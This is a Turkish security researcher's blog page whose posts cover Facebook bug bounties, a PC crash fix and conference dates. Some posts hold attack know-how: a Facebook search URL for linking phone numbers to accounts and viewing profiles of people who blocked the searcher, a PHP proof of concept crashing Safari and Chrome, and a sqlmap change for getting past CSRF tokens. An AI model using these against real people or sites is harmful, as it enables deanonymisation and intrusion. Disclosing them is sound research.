Featured Posts

<< >>

Telefon numarası ile facebook kullanıcısı tepit etmek hala mümkün mü?

Merhabalar, En son yazdığım blog yazım “Facebook’tan telefon numarasından kişi tespiti ve aldığım ödül” başlıklı yazının devamlı niteliğinde bazı konularda bilgi vermek istiyorum. Ayrıca bazı kişiler bu konu hala mümkün

Deja-vu… or how I discovered my acknowledged flaw second hand

To whom it may concern, In the recent days I was amazed to see that the news spread that a certain Mr. Reza Moaiandin had been able to discover Facebook

Facebook’tan telefon numarasından kişi tespiti ve aldığım ödül

​Merhabalar Son günlerde bazı haber kaynakları ve bloglarda facebook kullanıcıların telefon numarası bulunmasına yönelik haberler yayınlanmaktadır. Bu konuda bir güvenlik araştırmacısı bunu kendi bulduğunu iddia etmektedir. https://nakedsecurity.sophos.com/2015/08/11/change-this-facebook-setting-so-you-cant-be-searched-for-by-phone-number/ http://www.theregister.co.uk/2015/08/12/facebook_privacy_flap_data_phone_number/ Bu ve

Critical Kernel-Power Error 41

Merhabalar arkadaşlar, Yaklaşık 2 aydır masa üstü cihazımda Kernel-Power hatası alıyor ve cihaz yeniden başlıyordu. Denemediğim şey kalmadı cihaz üzerindeki anakart extreme edition olduğu için overclock panele sahip (asus x99) microsoft

Etkinlik ve Konferanslar

Merhaba arkadaşlar, Şubat, Mart ve Nisan ayı içerisinde bazı sunumlara katılamadım. sağlık ve iş gibi sıkıntılarından dolayı katılamadığım konferanslar için kusura bakmayın. Mayıs ayından itibaren kaldığımız yerden tüm hızıyla sunumlara

Telefon numarası ile facebook kullanıcısı tepit etmek hala mümkün mü?

Merhabalar,

En son yazdığım blog yazım “Facebook’tan telefon numarasından kişi tespiti ve aldığım ödül” başlıklı yazının devamlı niteliğinde bazı konularda bilgi vermek istiyorum. Ayrıca bazı kişiler bu konu hala mümkün mü diye merak edip mesajlar atmışlar, onlara da ayrıca bir yöntem paylaşacağım. Önceki yazıda söz konusu olan zafiyet kapatılmış olsa da farklı bir yöntem ile herhangi bir numaranın, email adresinin bulunması mümkün veya kişilerin sizi engelleyip engellemediğini görebilirsiniz. Fakat öncelikle asıl yazıyı yazmamı sağlayan konuyu özet geçiyorum.

Twitter ve Facebook üzerinden beni takip edenler, 2015 Mayıs içerisinde Facebook için 2 farklı güvenlik zafiyeti bildirimi yaptığımı görmüş olabilir. Hem zafiyetin kapanma süreçi, hemde Facebook ile yaptığım görüşmeler, hemen hemen 2 ayı bulmuş ve üstüne son günlerde yaşadığım iş ve eğitim konusundaki yoğunluktan ötürü, ilgili konunun bir şekilde arada kaynamasına sebep olmuştu. Yakın tarihte bazı yabancı haber kaynaklarında bu konuda bazı haberlere rastladım.(the guardian, the register vs.).

İlgili haberlerin içeriğinde benim Facebook’a bildirmiş olduğum zafiyetlerden birinin farklı bir güvenlik araştırmacası tarafından facebook’a bildirildiği ve sanki facebook’un bu konuyu ciddiye almadığı gibi bir algı yaratılmış, ilgili zafiyetinde Reza Moaiandin adında bir güvenlik araştırmacısının ortaya çıkardığı idda edilmiştir.

Söz konusu zafiyeti ve bununla birlikte farklı birkaç yöntemi “telefon numarsı üzerinden facebook kullanıcısı tespit etme” konusunda 2015 Nisan ayında bulgular elde edip, 2 Mayıs 2015 tarihinde de Facebook’a bildirmiştim. Önceki yazımda da belirttiğim üzere, bazı haber sitelerinde söylenenin aksine Facebook bu zafiyetleri ciddiye almıştır, ayrıca bu zafiyetlerden ötürüde bana 2.500 dolar ödül vermiştir. Fakat bir kaç konunun anlaşılması gerekli.

Facebook alt yapısında kullanıcılardan gelen isteklere yönelik bazı güvenlik önlemleri alınmaktadır. Bunu sanırım aşağıda paylaşacağım yöntem ile daha net bir şekilde anlayabileceksiniz. Bu güvenlik önlemlerinden biri rate-limitler. Yani örnekle anlatmak gerekirse sizin arama kısmına gelip, herhangi birini arama yaptığınızı ele alalım, bu arama işlemi üzerinden konuşacak olursak. Facebook tarafından bu arama girişimi 1 sorgu olarak algılanmaktadır. Yani rate-limit sayesinde Facebook şirketi size belirli bir limit kadar sorgu hakkı tanımaktadır. (650 – 700 sorgu) siz ancak bu sorgu limiti kadar sorgu yapabiliyorsunuz bu sayede belli kullanıcı bilgilerinin sızmasını engelliyor. Aynı zamanda ülkesel ve bölgeseler olarak cookie üzerinden yaptığı takiplerinde olduğunu söylüyor, bu sistem hakkında çok bilgi edinememiş olsakta en iyi anlaşılacak yer şifre sıfırlama bölümü. Yine şifre sıfırlama bölümü üzerinden herhangi bir telefon numarasını yazıp arama yaptığınızda ilgili telefon numarası üzerinde kayıtlı bir hesap varsa size gösteriyor. Ama burada 2 farklı durum var. Eğer ilgili hesap için giriş yapmayı denediğiniz ülke, bölge veya bilgisayar uyumsağlamazsa hesap resmi ve isim soyisim bilgisi gelmiyor sadece facebook kullanıcısı diyor, fakat ilgili hesap ile giriş yapmayı denediğiniz bilgisayar bölge ülke uyum sağlarsa o zaman resim ad soyad bilgisi görülüyor, ülke, bölge ve cookie ler üzerinden facebook’un bir dizi önlemler aldığını buradan kolayca anlayabiliriz. Biz bunu bildirdiğimizde bir güvenlik zafiyeti veya ihlali olarak görmeyecektir biz ne zaman ki bu sorgu limitini veya ülke bölge cookie vs gibi aldığı bir dizi önlemi aşabilirsiniz o zaman Facebook için bu bir sorun haline geliyor,

Hiç değilse bu güne kadar benim edindiğim Facebook tecrübesi bu yönde, son zafiyet için ele alırsak konuyu bana aynen şöyle bir imada bulundular, bizim rate-limitlerimiz var aşta görelim. Ben onlara ne zaman ki toplamda 1.200.000 sorgu çekebildiğimi gösterdim, ancak o zaman ödülü almaya hak kazandım. yani asıl ödülü almamı sağlayan şey, bu zafiyet ile birlikte 1.200.000 sorguyu çekebilmemi sağlan rate-limit sorunuydu.

Ödülü almamı sağlayan ve rate-limitlerin düzgün çalışmadığı yer Graph API(https://graph.facebook.com/graphql/?locale=tr_TR) üzerinde idi, şuan anlatacağım yöntemin bu alanla bir alakası bulunmamaktadır.

Şimdi gelelim, bizim herhangi bir telefon numarasının facebookta hangi kullanıcıya ait olduğunu nasıl tespit edeceğimize. Malumunuz Facebook diğer bildirimden sonra ödülü verince diğer zafiyeti kapattı. Fakat tespit ettiğim farklı yöntemler ile hala herhangi bir telefon numarasının hangi kullanıcıya ait olduğunu bulmak mümkün. fakat facebook’un belirlemiş olduğu rate-limitleri aşmak bu bölüm için size kalmış durumda. Yani bu yöntem ile öyle bir script yazıp topluca milyonlarca sorgu çekemezsiniz, bunu yapabilmek için farklı yöntemlere ihtiyacınız var. Eğer bunu yapabilirseniz o zaman bu bulgu facebook için bir risk oluşturacaktır. ve muhtemelen o zaman kapatacaklardır. Fakat bu hali ile mevcut sistemin bir parçası olarak durmaktadır. Neyse rate limiti aşmayı size bırakıp yöntemi paylaşıyorum.

Malumunuz Facebook bizlere bir çok alanda search kısmı sunmakta.Kişi arama bölümün dışında bir alandan daha kişi araması yapmamız mümkün. Normal arama kısmının dışında bu alandan yapılan herhangi bir “username, ad soyad ve telefon numarası” araması, normal arama bölümde uygulanan arama polikasının dışında çalışmaktadır. Bu bölüm üzerinde yapacağınız arama ile (Neden niçin ve hangi süretle olduğunu anlayamasamda) kişiler sizi engellemiş olsada görülebilmekte olup telefon numaları arama bölümünden gösterilmeye kapalı olsada olmasada görülmektedir.

herhangi bir numaranın hangi hesaba ait olduğunu bu yöntem ile kolayca öğrebilirsiniz.

https://www.facebook.com/browse/block_users?q=123456789

Sayıların olduğu yere telefon numarasını yazarak kolayca arama yapabilirsiniz fakat belli bir sayıdan sonra sorgu hakkını kalmayacak numara kayıtlı olsa dahi sonuçlar boş dönecektir.

Ayrıca buradan isim soyisim, username gibi bilgiler ilede arama yapabilirsiniz, bununda güzel yanı sizi engelleyen kişileride listede gösteriyor olması. Bu şekilde arama yaparak Sizi engellemiş olsa dahi kişilerin Profillerini görebilirsiniz, üzerine tıkladığınız zaman, kişinin zaman tüneline ulaşamıyorsanız anlayın ki o kişi sizi blocklamıştır. buda bonus olarak kalsın köşede.

Buda video:

Dipnot: sorguladığım numaraların kime ait olduğunu bilmiyorum, random oluşturulmuş olup, oluşabilecek her türlü yasal sorumluluk facebooktadır. ben rastgale telefon numarası sorgulayarak konuyu örneklendirdim. yasal bildirimi lütfen facebook üzerinden yapın.

Kalın sağlıcakla,
ibrahim

Deja-vu… or how I discovered my acknowledged flaw second hand

To whom it may concern,

In the recent days I was amazed to see that the news spread that a certain Mr. Reza Moaiandin had been able to discover Facebook users through their phone numbers. He states that he has discovered this flaw.

 

https://nakedsecurity.sophos.com/2015/08/11/change-this-facebook-setting-so-you-cant-be-searched-for-by-phone-number/

 

http://www.theregister.co.uk/2015/08/12/facebook_privacy_flap_data_phone_number/

 

However, I had discovered 2 security flaws in early April 2015, both of them were submitted on May 2nd,2015. and I have been awarded the humble sum of 2500 USD for this flaw in question. Report Number: 246267112

Through this flaw I was able to query and acquire the data of 1,200,000 Facebook users, which was necessary to give it proof, and then deleted them on ethical grounds. Please find my correspondence below.

Yours sincerely,

Ibrahim BALIC
Principal Security Researcher
Balich Information Security

 

facebook_bug3

facebook_bug

 

facebook_bug2

Facebook’tan telefon numarasından kişi tespiti ve aldığım ödül

​Merhabalar

Son günlerde bazı haber kaynakları ve bloglarda facebook kullanıcıların telefon numarası bulunmasına yönelik haberler yayınlanmaktadır. Bu konuda bir güvenlik araştırmacısı bunu kendi bulduğunu iddia etmektedir.

https://nakedsecurity.sophos.com/2015/08/11/change-this-facebook-setting-so-you-cant-be-searched-for-by-phone-number/

http://www.theregister.co.uk/2015/08/12/facebook_privacy_flap_data_phone_number/

Bu ve bununla birlikte telefon numarası ile kişi tespitini mümkün hale getiren 2 adet zafiyeti 2015, Nisan ayında tespit etmiştim, 2 mayıs tarihinde bildirdiğim bu zafiyetten ötürüde 2.500$ dolar para ödülü aldım.Bu zafiyetlerden ötürü 1.200.000 facebook kullanıcısının bilgisini alabildiğimi gösterdim ve tüm dataları sonra sildim. görüşmenin bir kısmı aşağıda yer almaktadır.

Teşekkürler,

Ibrahim BALIC
Principal Security Researcher
Balich Information Security

facebook_bug3
facebook_bug
facebook_bug2

Critical Kernel-Power Error 41

Merhabalar arkadaşlar,

kernel-power.41

Yaklaşık 2 aydır masa üstü cihazımda Kernel-Power hatası alıyor ve cihaz yeniden başlıyordu. Denemediğim şey kalmadı cihaz üzerindeki anakart extreme edition olduğu için overclock panele sahip (asus x99) microsoft sitesindede seneryolardan birinde overclock yapılanmasından kaynaklanabileceği söyleniyordu tüm konfigürasyonumu bozup default’a çektik ayarları fakat nafile, cihaz kapanmaya devam etti.

https://support.microsoft.com/en-us/kb/2028504

 

Sonra ki aşamada ısıdan şüphelendik su soğutma sistemi ilk deneyim edişimdi acaba dedim bunla alakalı olabilir mi, cpu üzerindeki soğutmayı terse çevirdik ve fan çıkışlarını değiştirdik. ters düz ettik yine çözüm üretemedik.

 

Son olarak power-supply den şüğhelenerek performans sıkıntısı olabileceğini düşündüm üzerinde 2 sli serisi ekran kartı olduğu için güç yetmiyor diye düşündük ekran kartlarından birini söktüm yine çözüm olmadı.

 

sonra internet üzerinden bir sürü araştırma yaptım, bir çok kişinin bu sorunu yaşadığını ama net bir çözüm önerisi olmadığını gördüm taki şuradaki elemanı görene kadar (kendisine Türkiye’ye geldiğinde bir yemek ısmarlayabilirim o derece)

 

http://www.tomshardware.co.uk/answers/id-2042905/asus-rampage-iii-extreme-overclocking-failed-error.html#12853678

 

Amca oğlunun iddasını mantıklı geldi, çünkü harici ses kartı kullanıyordum ( logitech h600 wifi) ve herif çözmüş olayı sorunun kaynağı onboard ses kartı driver’ı kaldırıp güncel driver’ı kurunca sorun ortadan kalkıyor. Umarım yaşamazsınız ama yaşarsanız bu yazı burada kalsın benim gibi aylarca kafa yormayın ( :

 

 

Etkinlik ve Konferanslar

Merhaba arkadaşlar,

Şubat, Mart ve Nisan ayı içerisinde bazı sunumlara katılamadım. sağlık ve iş gibi sıkıntılarından dolayı katılamadığım konferanslar için kusura bakmayın. Mayıs ayından itibaren kaldığımız yerden tüm hızıyla sunumlara devam edeceğim.

4 Mayıs 2015, Kocaeli Üniversitesi – Kocaeli

6 Mayıs 2015, Osmangazi Üniversitesi – Eskişehir

8 Mayıs 2015, Turgut Özal Üniversitesi – Ankara

13 Mayıs 2015, Namık Kemal Üniversitesi – Çorlu

15 Mayıs 2015, İzmir Gediz Üniversitesi – İzmir

Neden Siber Silahlar” başlıklı sunumumu gerçekleştireceğim.

 

Konferans ve Etkinlik ile ilgili talep ve davetler için ibrahimbalic@hotmail.com adresine e-mail atabilirsiniz arkadaşlar.

 

İyi çalışmalar

İbrahim

Python hakkında herşey

Merhaba arkadaşlar,

Python öğrenmek isteyenlerin faydalanabileceği güzel bir kaynak. Türkçe olması yeni başlayanlar için en büyük avantaj.

http://www.pythondersleri.com/

Garanti Bankası Rezil Hizmetinin Ses Kayıt’ı

Garanti Bankası Rezil Hizmeti.Resmen Vodafone ve Avea Kullanmayın dedi.

 

 

 

burada müşteri temsilcisinin göz ardı ettiği şey, suçlunun veya sorunun kimden kaynaklı olduğunun araştırılması ve giderilmesi konusunda çözüm üretici merci olarak benim Garanti bankasını müşteri temsilcisinin ise beni görüyor olmasıdır. Sorunun çözülüp hizmete dönüştürülmesi konusunda muhattabım garanti bankasıdır. Fakat ilgili yetkili kendisini haklı olduğuna o kadar inandırmış ki sanarsın mağdur olan garanti ve sebebi benim allah’ta benim belamı versin… Neyse hatalıysam email atın ( :

Mac OS X , iOS Chrome & Safari web browsers heap corruption bug

I think heap verify mechanism of Safari prevents the actual crash.

PoC 1 –> http://ibrahimbalic.com/ios2/

PoC 2 –> http://ibrahimbalic.com/nets/

PHP code:

<?php
ob_start(“ob_gzhandler”);
$ax = str_repeat(“aa/aa/./a”,2000000);
?>
<html>
<head>
</head>
<body>
<a http://<?php echo $ax;?>” id=”test”>test</a>
</body>
</html>

 

 

Crash:

Expected Results:
0:000:x86> .frame /r
00 0042e294 60b8cdfc CoreFoundation!CFStringEncodingSetForceASCIICompatibility+0x90
eax=00000000 ebx=06fb2d90 ecx=00000061 edx=00000000 esi=4bc90020 edi=0ab60c40
eip=60b982d7 esp=0042e284 ebp=0042e294 iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206
CoreFoundation!CFStringEncodingSetForceASCIICompatibility+0x90:
60b982d7 66890c42 mov word ptr [edx+eax*2],cx ds:002b:00000000=????
0:000:x86> ub .
CoreFoundation!CFStringEncodingSetForceASCIICompatibility+0x73:
60b982ba c3 ret
60b982bb 33c0 xor eax,eax
60b982bd 3944240c cmp dword ptr [esp+0Ch],eax
60b982c1 7e1f jle CoreFoundation!CFStringEncodingSetForceASCIICompatibility+0x9b (60b982e2)
60b982c3 8b4c2404 mov ecx,dword ptr [esp+4]
60b982c7 0fb60c08 movzx ecx,byte ptr [eax+ecx]
60b982cb 668b0c4dc898c260 mov cx,word ptr CoreFoundation!_CFDefaultEightBitStringEncoding+0x1a8 (60c298c8)[ecx*2]
60b982d3 8b542408 mov edx,dword ptr [esp+8]

 

Sqlmap ile CSRF Bypass

Merhabalar,

 

Birçok güvenlik araştırmacısı penetrasyon testleri yaparken, zafiyet tespit edebilmek için veya tespit ettikleri zafiyetleri exploit edebilmek adına çeşitli araçlardan faydalanmaktadır. Bu araçlar genel olarak işlemleri otomatik hale getiriyor olsalar da kısmen yetersiz kaldıkları durumlar veya güvenlik denetimlerine takıldıkları zamanlar vardır. Bu başlık altında SQLMap aracını kullanarak CSRF(Cross-site Request Forgery) için alınmış bir dizi önlemi bypass etmenin yollarına deyineceğim.

ttttaaa

 

Burada kullanılan CSRF mekanizmasının çalışma anatomisine göz atacak olursak, Server’ın, Client için gönderdiği cevapta (response) sayfa içerisindeki formlar için random bir token oluşturulmuş. Server Client’tan gelecek olan her istek için bu token değerini beklemektedir. Eğer bu token gönderilirse, Istek(request) için Cevap(response) verilecektir. Sayfa her yenilendiğinde (her request için) o sayfaya özel uniq bir token oluşturulmakta ve yapılacak istek için bu token beklenmektedir.

 

SQLMap aracının bu seneryo/mekanizma içerisinde kullanacağımızı düşünürsek, yapılacak atack’ın başarısız olacağını hemen anlayabiliriz.SQLMap’ın bu seneryo içerisinde server için yapacağı her istek içerisinde server için bir token göndermesi gerekmektedir. Bu tip bir durum için SQLMap içerisinde yapılacak ufak bir kaç değişiklik ile SQLMap için bu yetenek kazandırılabilinir.

Hedefimiz SQLMap aracığını çalışma mekanizmasını değiştirmek suretiyle yapacağı her istek(request) öncesinde Server’dan ilgili token değerini alıp, yapacağı bir sonraki istek(request) içerisinde bu token’ı kullanması. Bu sebeple bulmamız gereken öncelikli şey SQLMap aracının istek yapmış olduğu modül.

https://github.com/sqlmapproject/sqlmap/blob/master/lib/request/connect.py

SQLMap aracı biraz incelediğimizde yapılan her istek için connect.py içerisinde bulunan getPage functionını kullandığını açıkça görebilmekteyiz. Seneryomuza göre yapılacak her işlem için SQLMap aracının server ile iletişim sağlaması ise bu function içerisinde değişiklik yapmamız bizim için yeterli olacaktır.

Seneryomuza göre şimdiki hedefimiz server’ın client için oluşturduğu token’ı sayfa içerisinde tespit etmek. Bunu anlamak için giden trafiği veya sayfa içerisinde source code’un incelenmesi faydalı olacaktır.

Bizim örneğimizde __RequestVerificationToken değeri içerisinde gidip geldiğini görüyoruz.

 

fffkret

Server’ın client için oluşturduğu random token’ın tutulduğu input değerini tespit ettik, Şimdiki hedefimiz sunucuya kendi cookie değerimiz ile istekte(request) bulunup, bize göndermiş olduğu cevap(response) içerisinde __RequestVerificationToken değerini alıp, SQLMap içerisinde gönderilecek post değeri içerisine yerleştirmek.

connectpy

 

Yukarıda görmüş olduğunuz gibi connect.py içerisinde getpage functionında değişiklikler yaptım, 1. aşama olarak server için kendi cookie değerimi set ediyorum ve 2. aşamada bu cookie değeri ile server’a istek yapıyorum(request). 2. aşamada server’ın bana göndermiş olduğu cevap(response) içerisinde aradığım __RequestVerificationToken değerini parçalıyorum(parse ediyorum). Bu değeri alıp 4 aşamada SQLMap’in post parametresinin içerisindeki csrfid değişkeni ile server’dan aldığım değişkeni yer değiştiriyorum. Bu sayede SQLMap yapacağı her istek içerisinde server’a requestverification token yollamış oluyor.
ffffa

Sqlmap içerisinde __RequestVerificationToken parametresinin değerini csrfid olarak verdiğim için her istekte alınan request token burayla yer değiştirilecektir.

Bu mantık ile farklı uygulamalarda farklı denetimleri bypass edebilirsiniz.

Herkese iyi çalışmalar dilerim

İbrahim

Baliç Bilişim Sitesi ve Eğitim İçerikleri Yenilendi.

Merhabalar,

Baliç Bilişim’in websitesi ve eğitim içerikleri yenilendi.

www.balicbilisim.com